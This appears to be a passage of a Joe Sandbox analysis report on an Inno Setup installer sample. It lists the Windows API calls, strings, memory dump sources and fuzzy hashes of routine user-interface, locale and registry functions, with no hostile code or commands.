GetStockObject.GDI32(00000007), ref: 0041DE6B
GetStockObject.GDI32(00000005), ref: 0041DE77
GetStockObject.GDI32(0000000D), ref: 0041DE83
LoadIconA.USER32(00000000,00007F00), ref: 0041DE94

Memory Dump Source

Source File: 00000001.00000002.3367160249.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3367138515.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367224601.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367246783.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367385971.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367399997.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wG1fFAzGfH.jbxd

Similarity

API ID: ObjectStock$A4620A480A570IconLoad
String ID:
API String ID: 2905290459-0
Opcode ID: 8a3f536ffb6670d269bd6af103e53ebc3d3cf5e2ae60cc691583456349148664
Instruction ID: b4cf756beaef1adc4f5fbcf44fabff1cc3cb88bfcb9329de381bdc5a6adb432b
Opcode Fuzzy Hash: 8a3f536ffb6670d269bd6af103e53ebc3d3cf5e2ae60cc691583456349148664
Instruction Fuzzy Hash: 88113DB06443015EE740FF665896BAA3690DB24708F04813FF645AF2D2DB7D1CA49BAE

Function 00462968 Relevance: 10.8, APIs: 3, Strings: 3, Instructions: 273COMMON

Download Yara Rule

APIs

LoadCursorA.USER32(00000000,00007F02), ref: 00462A6C
SetCursor.USER32(00000000,00000000,00007F02,00000000,00462B01), ref: 00462A72
SetCursor.USER32(?,00462AE9,00007F02,00000000,00462B01), ref: 00462ADC

Strings

, xrefs: 00462D02
Internal error: Item already expanding, xrefs: 00462A09
, xrefs: 00462CE7

Memory Dump Source

Source File: 00000001.00000002.3367160249.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3367138515.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367224601.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367246783.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367385971.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367399997.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wG1fFAzGfH.jbxd

Similarity

API ID: Cursor$Load
String ID: $ $Internal error: Item already expanding
API String ID: 1675784387-1948079669
Opcode ID: ad683674f4580f1e1aa17f5a9c1d46edd0719ef7fbd07970485d4df48dda1b37
Instruction ID: 09c47418b275a9072aadbefc454c559749aab815838d7f365e24efc4a4a37fb5
Opcode Fuzzy Hash: ad683674f4580f1e1aa17f5a9c1d46edd0719ef7fbd07970485d4df48dda1b37
Instruction Fuzzy Hash: 0DB1A530600A04EFD720DF69D685B9ABBF1FF44304F1484AAE8459B7A2D7B8ED45CB19

Function 004756FC Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 200windowCOMMON

Download Yara Rule

APIs

GetClassInfoW.USER32(00000000,COMBOBOX,?), ref: 00475755
73EA59E0.USER32(00000000,000000FC,004756B0,00000000,00475994,?,00000000,004759BE), ref: 0047577C
GetACP.KERNEL32(00000000,00475994,?,00000000,004759BE), ref: 004757B9
SendMessageW.USER32(00000000,00000143,00000000,?), ref: 004757FF

Strings

Inno Setup: Language, xrefs: 00475887
COMBOBOX, xrefs: 0047574E

Memory Dump Source

Source File: 00000001.00000002.3367160249.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3367138515.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367224601.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367246783.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367385971.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367399997.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wG1fFAzGfH.jbxd

Similarity

API ID: ClassInfoMessageSend
String ID: COMBOBOX$Inno Setup: Language
API String ID: 1455646776-4234151509
Opcode ID: 1ccc6747c3039ead22a329b7f78916889190244fc8c6905f913f87e2f769e72b
Instruction ID: 765adbbab907e06bc7bf6e6f7cf1d32fb8b56d6e7c29df1de031be62d4a3d325
Opcode Fuzzy Hash: 1ccc6747c3039ead22a329b7f78916889190244fc8c6905f913f87e2f769e72b
Instruction Fuzzy Hash: F7815E70A00605DFC710EF69D885A9EB7F5FB09314F1581BAE808EB362D774AD41CB99

Function 00408728 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 167COMMON

Download Yara Rule

APIs

GetSystemDefaultLCID.KERNEL32(00000000,00408970,?,?,?,?,00000000,00000000,00000000,?,00409977,00000000,0040998A), ref: 00408742

Part of subcall function 00408570: GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0049A4C0,00000001,?,0040863B,?,00000000,0040871A), ref: 0040858E

Part of subcall function 004085BC: GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,004087BE,?,?,?,00000000,00408970), ref: 004085CF

Strings

AMPM, xrefs: 0040890D
:mm:ss, xrefs: 0040893E
m/d/yy, xrefs: 00408811
:mm, xrefs: 00408924
mmmm d, yyyy, xrefs: 00408833

Memory Dump Source

Source File: 00000001.00000002.3367160249.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3367138515.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367224601.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367246783.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367385971.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367399997.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wG1fFAzGfH.jbxd

Similarity

API ID: InfoLocale$DefaultSystem
String ID: AMPM$:mm$:mm:ss$m/d/yy$mmmm d, yyyy
API String ID: 1044490935-665933166
Opcode ID: 77a209930b2735c0ddecf28fb65780fc2527dfa24ec1165d9e089488809fe89d
Instruction ID: 5b8a50df068a6b2da3a3ead13541c1976fd8fe610af15afaced6bb711b513b54
Opcode Fuzzy Hash: 77a209930b2735c0ddecf28fb65780fc2527dfa24ec1165d9e089488809fe89d
Instruction Fuzzy Hash: 35513024B00108ABD701FBA69D41A9E77A9DB94304F50C07FA441BB3C6DE3DDE15875E

Function 00411704 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 158windowCOMMON

Download Yara Rule

APIs

GetVersion.KERNEL32(00000000,00411909), ref: 0041179C
InsertMenuItemA.USER32(?,000000FF,00000001,0000002C), ref: 0041185A

Part of subcall function 00411ABC: CreatePopupMenu.USER32 ref: 00411AD6

InsertMenuA.USER32(?,000000FF,?,?,00000000), ref: 004118E6

Part of subcall function 00411ABC: CreateMenu.USER32 ref: 00411AE0

InsertMenuA.USER32(?,000000FF,?,00000000,00000000), ref: 004118CD

Strings

?, xrefs: 004117B6
,, xrefs: 004117AF

Memory Dump Source

Source File: 00000001.00000002.3367160249.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3367138515.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367224601.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367246783.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367385971.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367399997.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wG1fFAzGfH.jbxd

Similarity

API ID: Menu$Insert$Create$ItemPopupVersion
String ID: ,$?
API String ID: 2359071979-2308483597
Opcode ID: 57ccdcba8889ff27764a16026ea30ef1297fbdf3a800011468703812a277a737
Instruction ID: bc3149483dfa03cdc0807f0a56c3f90cc05caec19bb46b1e0c32919a2f580dbf
Opcode Fuzzy Hash: 57ccdcba8889ff27764a16026ea30ef1297fbdf3a800011468703812a277a737
Instruction Fuzzy Hash: 95512674A00144ABDB00EF6ADC816EA7BF9AF09304B11817BFA04E73A6D738C941CB5C

Function 0041BE73 Relevance: 10.7, APIs: 7, Instructions: 153windowCOMMON

Download Yara Rule

APIs

GetObjectA.GDI32(?,00000018,?), ref: 0041BF38
GetObjectA.GDI32(?,00000018,?), ref: 0041BF47
GetBitmapBits.GDI32(?,?,?), ref: 0041BF98
GetBitmapBits.GDI32(?,?,?), ref: 0041BFA6
DeleteObject.GDI32(?), ref: 0041BFAF
DeleteObject.GDI32(?), ref: 0041BFB8
CreateIcon.USER32(00400000,?,?,?,?,?,?), ref: 0041BFD5

Memory Dump Source

Source File: 00000001.00000002.3367160249.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3367138515.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367224601.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367246783.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367385971.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367399997.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wG1fFAzGfH.jbxd

Similarity

API ID: Object$BitmapBitsDelete$CreateIcon
String ID:
API String ID: 1030595962-0
Opcode ID: c1e7ff30722f84a59b7c576368abad4b11806281d6eddf659bf093bc56a2286c
Instruction ID: b628a60b6e344882d317dd96d191c0cb792f95d1e2fbfe9e34044ce63643746d
Opcode Fuzzy Hash: c1e7ff30722f84a59b7c576368abad4b11806281d6eddf659bf093bc56a2286c
Instruction Fuzzy Hash: 48510571E00219AFCB14DFA9C8819EEBBF9EF48314B11442AF914E7391D738AD81CB64

Function 0041CEE8 Relevance: 10.7, APIs: 7, Instructions: 152windowCOMMON

Download Yara Rule

APIs

SetStretchBltMode.GDI32(00000000,00000003), ref: 0041CF0E
73EA4620.GDI32(00000000,00000026), ref: 0041CF2D
73E98830.GDI32(?,?,00000001,00000000,00000026), ref: 0041CF93
73E922A0.GDI32(?,?,?,00000001,00000000,00000026), ref: 0041CFA2
StretchBlt.GDI32(00000000,?,?,?,?,?,00000000,00000000,00000000,?,?), ref: 0041D00C
StretchDIBits.GDI32(?,?,?,?,?,00000000,00000000,00000000,?,?,?,00000000,?), ref: 0041D04A
73E98830.GDI32(?,?,00000001,0041D07C,00000000,00000026), ref: 0041D06F

Memory Dump Source

Source File: 00000001.00000002.3367160249.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3367138515.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367224601.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367246783.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367385971.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367399997.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wG1fFAzGfH.jbxd

Similarity

API ID: Stretch$E98830$A4620BitsE922Mode
String ID:
API String ID: 4209919087-0
Opcode ID: d1728d26c473023a034cda29587c75d8a44e61feb8d5ac31eb3562e546440a0c
Instruction ID: 415929d19c0355200a34ec50ec85ee50bdb26205500aadc12dd1df5ccaef5bc8
Opcode Fuzzy Hash: d1728d26c473023a034cda29587c75d8a44e61feb8d5ac31eb3562e546440a0c
Instruction Fuzzy Hash: 7A514EB0604200AFD714DFA9C995F9BBBF9EF08304F10859AB549DB292C779ED81CB58

Function 004564D4 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 103windowCOMMON

Download Yara Rule

APIs

SendMessageA.USER32(00000000,?,?), ref: 00456526

Part of subcall function 0042428C: GetWindowTextA.USER32(?,?,00000100), ref: 004242AC

Part of subcall function 0041EEB4: GetCurrentThreadId.KERNEL32 ref: 0041EF03
Part of subcall function 0041EEB4: 73EA5940.USER32(00000000,0041EE64,00000000,00000000,0041EF20,?,00000000,0041EF57,?,0042ED24,?,00000001), ref: 0041EF09

Part of subcall function 004242D4: SetWindowTextA.USER32(?,00000000), ref: 004242EC

GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0045658D
TranslateMessage.USER32(?), ref: 004565AB
DispatchMessageA.USER32(?), ref: 004565B4

Strings

[Paused] , xrefs: 0045655C

Memory Dump Source

Source File: 00000001.00000002.3367160249.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3367138515.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367224601.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367246783.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367385971.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367399997.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wG1fFAzGfH.jbxd

Similarity

API ID: Message$TextWindow$A5940CurrentDispatchSendThreadTranslate
String ID: [Paused]
API String ID: 1715333840-4230553315
Opcode ID: dc734b73e23721f0060ca7094c6900a610c91b21ae2acdfdba29acc3faa202e8
Instruction ID: b21e1f9e90a9f2d36a55999f4aec8319d50e535270b7c0faa20aeab8e88a7384
Opcode Fuzzy Hash: dc734b73e23721f0060ca7094c6900a610c91b21ae2acdfdba29acc3faa202e8
Instruction Fuzzy Hash: 9B310B70904248AEDB01DBB5DC41BCE7BB8EB0D314F95407BF800E3296D67C9909CBA9

Function 0046A628 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 99sleepCOMMON

Download Yara Rule

APIs

GetCursor.USER32(00000000,0046A767), ref: 0046A6E4
LoadCursorA.USER32(00000000,00007F02), ref: 0046A6F2
SetCursor.USER32(00000000,00000000,00007F02,00000000,0046A767), ref: 0046A6F8
Sleep.KERNEL32(000002EE,00000000,00000000,00007F02,00000000,0046A767), ref: 0046A702
SetCursor.USER32(00000000,000002EE,00000000,00000000,00007F02,00000000,0046A767), ref: 0046A708

Strings

CheckPassword, xrefs: 0046A68C

Memory Dump Source

Source File: 00000001.00000002.3367160249.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3367138515.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367224601.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367246783.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367385971.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367399997.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wG1fFAzGfH.jbxd

Similarity

API ID: Cursor$LoadSleep
String ID: CheckPassword
API String ID: 4023313301-1302249611
Opcode ID: 0cd4e794cb0659d1b4c7be91935d04c2b5f54db07be9f479e0bdba40b14c3856
Instruction ID: 8e453c91c0c590c9759b614a584e43fa839bbbc5a3d1c7197c153ffb71e3d1f4
Opcode Fuzzy Hash: 0cd4e794cb0659d1b4c7be91935d04c2b5f54db07be9f479e0bdba40b14c3856
Instruction Fuzzy Hash: 36319334640604AFD711EB69C989F9E7BE0EF05305F5580B6F844AB3A2D778EE00CB5A

Function 00476714 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 92windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0047663C: GetWindowThreadProcessId.USER32(00000000), ref: 00476644
Part of subcall function 0047663C: GetModuleHandleA.KERNEL32(user32.dll,AllowSetForegroundWindow,00000000,?,?,0047673B,0049B050,00000000), ref: 00476657
Part of subcall function 0047663C: GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0047665D

SendMessageA.USER32(00000000,0000004A,00000000,00476ACE), ref: 00476749
GetTickCount.KERNEL32 ref: 0047678E
GetTickCount.KERNEL32 ref: 00476798
MsgWaitForMultipleObjects.USER32(00000000,00000000,00000000,0000000A,000000FF), ref: 004767ED

Strings

CallSpawnServer: Unexpected response: $%x, xrefs: 0047677E
CallSpawnServer: Unexpected status: %d, xrefs: 004767D6

Memory Dump Source

Source File: 00000001.00000002.3367160249.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3367138515.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367224601.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367246783.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367385971.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367399997.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wG1fFAzGfH.jbxd

Similarity

API ID: CountTick$AddressHandleMessageModuleMultipleObjectsProcProcessSendThreadWaitWindow
String ID: CallSpawnServer: Unexpected response: $%x$CallSpawnServer: Unexpected status: %d
API String ID: 613034392-3771334282
Opcode ID: aa8cf3b1ca808e1997025c551cec6cc8e4be10c38fa863c1333764af79a3be99
Instruction ID: 71a83a78c23d55d33e7515897efa00ecebce1ccd6bd4cc0fbedfc923aec738ff
Opcode Fuzzy Hash: aa8cf3b1ca808e1997025c551cec6cc8e4be10c38fa863c1333764af79a3be99
Instruction Fuzzy Hash: 7831C074F006149ADB10EBB9C8827EEB3E29F04304F91843BB548EB382D67C8D018B9D

Function 00458EA4 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 86libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(626D6573,CreateAssemblyCache), ref: 00458F5F

Strings

Failed to get address of .NET Framework CreateAssemblyCache function, xrefs: 00458F6A
.NET Framework CreateAssemblyCache function failed, xrefs: 00458F82
Fusion.dll, xrefs: 00458EFF
CreateAssemblyCache, xrefs: 00458F56
Failed to load .NET Framework DLL "%s", xrefs: 00458F44

Memory Dump Source

Source File: 00000001.00000002.3367160249.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3367138515.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367224601.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367246783.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367385971.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367399997.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wG1fFAzGfH.jbxd

Similarity

API ID: AddressProc
String ID: .NET Framework CreateAssemblyCache function failed$CreateAssemblyCache$Failed to get address of .NET Framework CreateAssemblyCache function$Failed to load .NET Framework DLL "%s"$Fusion.dll
API String ID: 190572456-3990135632
Opcode ID: e7405bef0de90a1b20b21130be7ac328c98422d0360e923e9ad54989aa78f0ae
Instruction ID: b0fae5d47ad60a87b9f111cdb81e12311f6487f55351a3ce1c195c50c1487ae5
Opcode Fuzzy Hash: e7405bef0de90a1b20b21130be7ac328c98422d0360e923e9ad54989aa78f0ae
Instruction Fuzzy Hash: 31317971E00605ABCB00DFA5C88169EB7B5AF48315F50857FE814F7382DF7899098799

Function 0041C158 Relevance: 10.6, APIs: 7, Instructions: 70windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0041C058: GetObjectA.GDI32(?,00000018), ref: 0041C065

GetFocus.USER32 ref: 0041C178
73E9A570.USER32(?), ref: 0041C184
73E98830.GDI32(?,?,00000000,00000000,0041C203,?,?), ref: 0041C1A5
73E922A0.GDI32(?,?,?,00000000,00000000,0041C203,?,?), ref: 0041C1B1
GetDIBits.GDI32(?,?,00000000,?,?,?,00000000), ref: 0041C1C8
73E98830.GDI32(?,00000000,00000000,0041C20A,?,?), ref: 0041C1F0
73E9A480.USER32(?,?,0041C20A,?,?), ref: 0041C1FD

Memory Dump Source

Source File: 00000001.00000002.3367160249.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3367138515.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367224601.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367246783.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367385971.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367399997.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wG1fFAzGfH.jbxd

Similarity

API ID: E98830$A480A570BitsE922FocusObject
String ID:
API String ID: 2688936647-0
Opcode ID: 6a39f5637e621883ca0517ce44c3b694a92d9286788943b8a56663a62e87c7eb
Instruction ID: a51b9c7cee13939b32e911f1849152ebfa7eb0d73570b73294f05c7218cf190f
Opcode Fuzzy Hash: 6a39f5637e621883ca0517ce44c3b694a92d9286788943b8a56663a62e87c7eb
Instruction Fuzzy Hash: A0116A71E40609BBDB10DBE9CC85FAFBBFCEF48700F54446AB518E7281D67899008B28

Function 00418C64 Relevance: 10.6, APIs: 7, Instructions: 67COMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32(0000000E), ref: 00418C80
GetSystemMetrics.USER32(0000000D), ref: 00418C88
6F9A2980.COMCTL32(00000000,0000000D,00000000,0000000E,00000001,00000001,00000001,00000000), ref: 00418C8E

Part of subcall function 004099C0: 6F99C400.COMCTL32(0049A628,000000FF,00000000,00418CBC,00000000,00418D18,?,00000000,0000000D,00000000,0000000E,00000001,00000001,00000001,00000000), ref: 004099C4

6FA0CB00.COMCTL32(0049A628,00000000,00000000,00000000,00000000,00418D18,?,00000000,0000000D,00000000,0000000E,00000001,00000001,00000001,00000000), ref: 00418CDE
6FA0C740.COMCTL32(00000000,?,0049A628,00000000,00000000,00000000,00000000,00418D18,?,00000000,0000000D,00000000,0000000E,00000001,00000001,00000001), ref: 00418CE9
6FA0CB00.COMCTL32(0049A628,00000001,?,?,00000000,?,0049A628,00000000,00000000,00000000,00000000,00418D18,?,00000000,0000000D,00000000), ref: 00418CFC
6F9A0860.COMCTL32(0049A628,00418D1F,?,00000000,?,0049A628,00000000,00000000,00000000,00000000,00418D18,?,00000000,0000000D,00000000,0000000E), ref: 00418D12

Memory Dump Source

Source File: 00000001.00000002.3367160249.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3367138515.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367224601.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367246783.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367385971.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367399997.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wG1fFAzGfH.jbxd

Similarity

API ID: MetricsSystem$A0860A2980C400C740
String ID:
API String ID: 1086221473-0
Opcode ID: 77375f6f841bd32482ac362321ef56034a1adac8671eb50e5d38b587b56b4f6d
Instruction ID: 436211bc77980f3f3c6a2ba6eafd8e316937a2835f40b04245610037118c4977
Opcode Fuzzy Hash: 77375f6f841bd32482ac362321ef56034a1adac8671eb50e5d38b587b56b4f6d
Instruction Fuzzy Hash: FB1149B1744204BBDB10EBA9DC83F5E73B8DB48704F6044BABA04E72D2DA799D409759

Function 00481FE0 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 61registryCOMMON

Download Yara Rule

APIs

Part of subcall function 0042DD44: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,00481F57,?,00000001,?,?,00481F57,?,00000001,00000000), ref: 0042DD60

RegCloseKey.ADVAPI32(?,?,00000001,00000000,00000000,00482098), ref: 0048207D

Strings

ServerNT, xrefs: 00482061
LanmanNT, xrefs: 00482047
WinNT, xrefs: 0048202D
System\CurrentControlSet\Control\ProductOptions, xrefs: 00482004
ProductType, xrefs: 0048201C

Memory Dump Source

Source File: 00000001.00000002.3367160249.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3367138515.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367224601.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367246783.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367385971.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367399997.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wG1fFAzGfH.jbxd

Similarity

API ID: CloseOpen
String ID: LanmanNT$ProductType$ServerNT$System\CurrentControlSet\Control\ProductOptions$WinNT
API String ID: 47109696-2530820420
Opcode ID: 3270de2230ad746d97d59dd4353e0cd3c44e793d3e1148cc667fa9374d6162f5
Instruction ID: 2fd02ba07ad27dcdf7cb645fdb5409a97311ae270af1ac1656c6f1dc0261d506
Opcode Fuzzy Hash: 3270de2230ad746d97d59dd4353e0cd3c44e793d3e1148cc667fa9374d6162f5
Instruction Fuzzy Hash: 4911D030604208AADB10F6A29E02B5F7AA8DB42354F508877AA01E7292E7BE8D45D75D

Function 0041B472 Relevance: 10.6, APIs: 7, Instructions: 57windowCOMMON

Download Yara Rule

APIs

SelectObject.GDI32(00000000,?), ref: 0041B480
SelectObject.GDI32(?,00000000), ref: 0041B48F
StretchBlt.GDI32(?,00000000,00000000,0000000B,?,00000000,00000000,00000000,?,?,00CC0020), ref: 0041B4BB
SelectObject.GDI32(00000000,00000000), ref: 0041B4C9
SelectObject.GDI32(?,00000000), ref: 0041B4D7
DeleteDC.GDI32(00000000), ref: 0041B4E0
DeleteDC.GDI32(?), ref: 0041B4E9

Memory Dump Source

Source File: 00000001.00000002.3367160249.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3367138515.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367224601.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367246783.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367385971.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367399997.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wG1fFAzGfH.jbxd

Similarity

API ID: ObjectSelect$Delete$Stretch
String ID:
API String ID: 1458357782-0
Opcode ID: 72b6a28bf9d60e237e3396a0a8e2fc7d77968e10b7c0149e345d15a7b5d8e936
Instruction ID: 28529174ed8a1a36c66279ad8c479dcd7ed434ba0fbaa502c63cdd0cc078bbc5
Opcode Fuzzy Hash: 72b6a28bf9d60e237e3396a0a8e2fc7d77968e10b7c0149e345d15a7b5d8e936
Instruction Fuzzy Hash: A1114C72E40559ABDF10D6D9D885FAFB3BCEF08704F048456B614FB241C678A8418B54

Function 004233A4 Relevance: 10.6, APIs: 7, Instructions: 56threadwindowCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32 ref: 004233BF
WindowFromPoint.USER32(?,?), ref: 004233CC
GetWindowThreadProcessId.USER32(00000000,00000000), ref: 004233DA
GetCurrentThreadId.KERNEL32 ref: 004233E1
SendMessageA.USER32(00000000,00000084,?,?), ref: 004233FA
SendMessageA.USER32(00000000,00000020,00000000,00000000), ref: 00423411
SetCursor.USER32(00000000), ref: 00423423

Memory Dump Source

Source File: 00000001.00000002.3367160249.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

